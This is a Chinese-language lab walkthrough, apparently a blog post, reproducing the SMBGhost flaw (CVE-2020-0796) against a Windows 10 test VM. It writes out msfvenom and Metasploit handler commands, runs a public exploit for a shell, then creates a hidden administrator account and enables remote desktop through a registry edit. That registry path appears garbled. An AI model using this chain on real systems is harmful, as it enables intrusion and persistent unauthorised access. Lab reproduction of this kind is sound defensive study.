• CVE-2020-0796复现


    今天整理资料时发现了之前存的一个cve漏洞复现过程,当时打算跟着复现来着,后来也没去复现,今天刚好有时间,所以来复现一下这个漏洞

    漏洞讲解

    https://www.freebuf.com/vuls/233263.html
    https://blog.csdn.net/RatOnSea/article/details/106399450
    https://www.cnblogs.com/A66666/p/29635a243378b49ccb485c7a280df989.html
    

    漏洞复现

    下文中所使用的文件

    镜像:ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|
    Scanner:
    1.https://github.com/ollypwn/SMBGhost
    2.http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
    POC:https://github.com/chompie1337/SMBGhost_RCE_PoC.git
    

    靶机信息

    Windows10:192.168.0.129
    kali:192.168.0.130

    漏洞扫描

    python3 scanner.py 192.168.0.129
    

    使用metasploit生成脚本

    msfvenom -p windows/x64/meterpreter/bind_tcp lport=6666 -f py -o tool.py
    

    将poc中的exploit.py中的USER_PAYLOAD替换为metasploit生成的buf


    使用metasploit对6666端口进行监听

    msfconsole
    use exploit/multi/handler
    set payload windows/x64/meterpreter/bind_tcp
    show options
    set LPORT 6666
    set RHOST 192.168.0.129
    exploit
    


    运行之前修改的exploit.py

    python3 exploit1.py -ip 192.168.0.129
    



    成功拿到shell,完成复现

    提权

    创建新用户

    net user hack hack /add
    

    加入管理员组中

    net localgroup Administrators hack /add
    net localgroup Users hack /del
    

    查看当前用户的信息

    net user hack
    

    获得一个管理员权限的账号,尝试使用远程连接工具进行连接

    开启远程连接功能

    发现无法连接,使用如下命令开启远程连接功能

    REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    


    连接成功,获得权限

    等待30秒后即可成功连接

  • 相关阅读:
    OpenStack--Rabbitmq组件消息队列
    Redis-主从
    haproxy mycat mysql 读写分离MHA高可用
    mysql小白系列_14 线上故障分析与排错
    mysql小白系列_13 Online DDL
    mysql小白系列_12 sysbench
    mysql小白系列_11 MHA补充
    mysql小白系列_11 MHA
    mysql小白系列_10 mysql主从复制原理
    mysql小白系列_09 mysql性能优化关键点
  • 原文地址:https://www.cnblogs.com/anweilx/p/13056586.html
Copyright © 2020-2023  润新知